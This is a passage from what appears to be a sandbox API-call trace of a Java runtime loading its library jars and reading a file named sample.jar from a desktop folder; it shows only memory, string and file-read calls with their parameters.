lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37)) returned 1 [0105.378] free (_Block=0x1220f9c0) [0105.381] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.381] malloc (_Size=0x76) returned 0x122f6010 [0105.381] wcscpy (in: _Dest=0x122f6010, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" [0105.381] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x208d688, lpFilePart=0x208d680 | out: lpBuffer="", lpFilePart=0x208d680*=0x0) returned 0x36 [0105.381] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\sunrsasign.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d420 | out: lpFileInformation=0x208d420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2114050, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6fb564c8, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x6f778df4, nFileSizeHigh=0x0, nFileSizeLow=0x208d490)) returned 0 [0105.381] GetLastError () returned 0x2 [0105.381] free (_Block=0x122f6010) [0105.382] strlen (_Str="java/io/FileNotFoundException.class") returned 0x23 [0105.382] malloc (_Size=0x48) returned 0x1228e460 [0105.382] malloc (_Size=0xa0) returned 0x122f98d0 [0105.382] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416545, lpNewFilePointer=0x208c790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c790*=54617413) returned 1 [0105.382] ReadFile (in: hFile=0x134, lpBuffer=0x122f98d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c760, lpOverlapped=0x0 | out: lpBuffer=0x122f98d0*, lpNumberOfBytesRead=0x208c760*=0xa0, lpOverlapped=0x0) returned 1 [0105.382] malloc (_Size=0x24) returned 0x122fa5f0 [0105.388] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0105.388] malloc (_Size=0x6a) returned 0x122f5810 [0105.388] wcscpy (in: _Dest=0x122f5810, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" [0105.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x30 [0105.388] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jsse.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06ba66, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed06ba66, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed08b63d, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x916df)) returned 1 [0105.388] free (_Block=0x122f5810) [0105.391] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0105.391] malloc (_Size=0x68) returned 0x1220f800 [0105.391] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0105.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x2f [0105.391] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3)) returned 1 [0105.391] free (_Block=0x1220f800) [0105.397] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned 0x33 [0105.397] malloc (_Size=0x72) returned 0x122f4f90 [0105.397] wcscpy (in: _Dest=0x122f4f90, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" [0105.397] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x34 [0105.397] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\charsets.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed0d231e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed0d231e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa)) returned 1 [0105.398] free (_Block=0x122f4f90) [0105.398] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned 0x2e [0105.399] malloc (_Size=0x68) returned 0x1220f4f0 [0105.399] wcscpy (in: _Dest=0x1220f4f0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" [0105.399] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x2f [0105.399] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jfr.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb461a65, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb461a65, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb4641bd, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x88e49)) returned 1 [0105.399] free (_Block=0x1220f4f0) [0105.400] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.400] malloc (_Size=0x60) returned 0x1220fa30 [0105.400] wcscpy (in: _Dest=0x1220fa30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_171\\classes" [0105.400] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes", nBufferLength=0x9, lpBuffer=0x208d688, lpFilePart=0x208d680 | out: lpBuffer="", lpFilePart=0x208d680*=0x0) returned 0x2b [0105.400] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes" (normalized: "c:\\program files\\java\\jre1.8.0_171\\classes"), fInfoLevelId=0x0, lpFileInformation=0x208d420 | out: lpFileInformation=0x208d420*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0xc009e1f8, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x208d430, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x11b0e85c, nFileSizeHigh=0x0, nFileSizeLow=0x208d498)) returned 0 [0105.400] GetLastError () returned 0x2 [0105.400] free (_Block=0x1220fa30) [0105.402] strlen (_Str="java/net/URLClassLoader$2.class") returned 0x1f [0105.402] malloc (_Size=0x48) returned 0x1228e5a0 [0105.402] malloc (_Size=0xa0) returned 0x122f99d0 [0105.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3403dc0, lpNewFilePointer=0x208e4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4d0*=54541760) returned 1 [0105.402] ReadFile (in: hFile=0x134, lpBuffer=0x122f99d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4a0, lpOverlapped=0x0 | out: lpBuffer=0x122f99d0*, lpNumberOfBytesRead=0x208e4a0*=0xa0, lpOverlapped=0x0) returned 1 [0105.402] malloc (_Size=0x20) returned 0x122fa050 [0105.406] malloc (_Size=0x48) returned 0x1228ed20 [0105.406] malloc (_Size=0x98) returned 0x122f99d0 [0105.406] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb0788, lpNewFilePointer=0x208e060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e060*=722824) returned 1 [0105.406] ReadFile (in: hFile=0x2c0, lpBuffer=0x122f99d0, nNumberOfBytesToRead=0x98, lpNumberOfBytesRead=0x208e030, lpOverlapped=0x0 | out: lpBuffer=0x122f99d0*, lpNumberOfBytesRead=0x208e030*=0x98, lpOverlapped=0x0) returned 1 [0105.406] malloc (_Size=0x13) returned 0x122fadd0 [0105.532] strlen (_Str="sun/net/www/protocol/jar/URLJarFile.class") returned 0x29 [0105.532] malloc (_Size=0x48) returned 0x1228e730 [0105.532] malloc (_Size=0xa0) returned 0x122f99d0 [0105.532] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340d6cb, lpNewFilePointer=0x208e1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1e0*=54580939) returned 1 [0105.533] ReadFile (in: hFile=0x134, lpBuffer=0x122f99d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e1b0, lpOverlapped=0x0 | out: lpBuffer=0x122f99d0*, lpNumberOfBytesRead=0x208e1b0*=0xa0, lpOverlapped=0x0) returned 1 [0105.534] malloc (_Size=0x2a) returned 0x12299040 [0105.560] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0105.561] malloc (_Size=0x5c) returned 0x1220f640 [0105.561] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0105.561] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2c4 [0105.561] GetFileTime (in: hFile=0x2c4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208f1c8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208f1c8*(dwLowDateTime=0x9ccdf400, dwHighDateTime=0x1d7cbd3)) returned 1 [0105.562] CloseHandle (hObject=0x2c4) returned 1 [0105.562] free (_Block=0x1220f640) [0105.562] malloc (_Size=0x29) returned 0x12298240 [0105.562] _errno () returned 0x20f6be0 [0105.563] strlen (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0105.563] strcpy (in: _Dest=0x208ed80, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0105.563] strcmp (_Str1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0 [0105.563] free (_Block=0x12298240) [0105.568] strlen (_Str="sun/net/www/protocol/jar/URLJarFile$URLJarFileEntry.class") returned 0x39 [0105.568] malloc (_Size=0x48) returned 0x1228ee10 [0105.568] malloc (_Size=0xa0) returned 0x122f99d0 [0105.568] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340d664, lpNewFilePointer=0x208e4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4d0*=54580836) returned 1 [0105.569] ReadFile (in: hFile=0x134, lpBuffer=0x122f99d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4a0, lpOverlapped=0x0 | out: lpBuffer=0x122f99d0*, lpNumberOfBytesRead=0x208e4a0*=0xa0, lpOverlapped=0x0) returned 1 [0105.569] malloc (_Size=0x3a) returned 0x1228eb40 [0105.627] calloc (_Count=0x1, _Size=0x58) returned 0x12228a00 [0105.627] malloc (_Size=0x1bf0) returned 0x12327fd0 [0105.630] strlen (_Str="java/io/ByteArrayOutputStream") returned 0x1d [0105.632] strlen (_Str="java/io/InputStream") returned 0x13 [0105.633] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x1e117, lpNewFilePointer=0x208d280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d280*=123159) returned 1 [0105.633] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d250, lpOverlapped=0x0 | out: lpBuffer=0x208d2d0*, lpNumberOfBytesRead=0x208d250*=0x1e, lpOverlapped=0x0) returned 1 [0105.633] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x1e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=123207) returned 1 [0105.633] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.633] malloc (_Size=0x8000) returned 0x12d48a80 [0105.636] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x20147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=131399) returned 1 [0105.636] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.637] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x22147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=139591) returned 1 [0105.637] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.638] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x24147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=147783) returned 1 [0105.639] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.640] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x26147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=155975) returned 1 [0105.640] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.641] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x28147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=164167) returned 1 [0105.641] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.643] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x2a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=172359) returned 1 [0105.643] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.643] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x2c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=180551) returned 1 [0105.643] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.644] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x2e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=188743) returned 1 [0105.644] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.671] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x30147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=196935) returned 1 [0105.671] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.672] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x32147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=205127) returned 1 [0105.672] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.673] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x34147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=213319) returned 1 [0105.673] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.676] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x36147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=221511) returned 1 [0105.676] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.678] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x38147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=229703) returned 1 [0105.678] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.679] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x3a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=237895) returned 1 [0105.679] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.680] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x3c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=246087) returned 1 [0105.680] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.681] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x3e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=254279) returned 1 [0105.681] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.682] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x40147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=262471) returned 1 [0105.682] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.683] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x42147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=270663) returned 1 [0105.683] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.684] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x44147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=278855) returned 1 [0105.684] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.684] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x46147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=287047) returned 1 [0105.684] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.685] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x48147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=295239) returned 1 [0105.685] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.686] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x4a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=303431) returned 1 [0105.686] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.691] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x4c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=311623) returned 1 [0105.691] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.692] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x4e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=319815) returned 1 [0105.695] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.695] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x50147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=328007) returned 1 [0105.696] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.696] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x52147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=336199) returned 1 [0105.696] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.697] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x54147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=344391) returned 1 [0105.697] ReadFile (in: hFile=0x2c0, 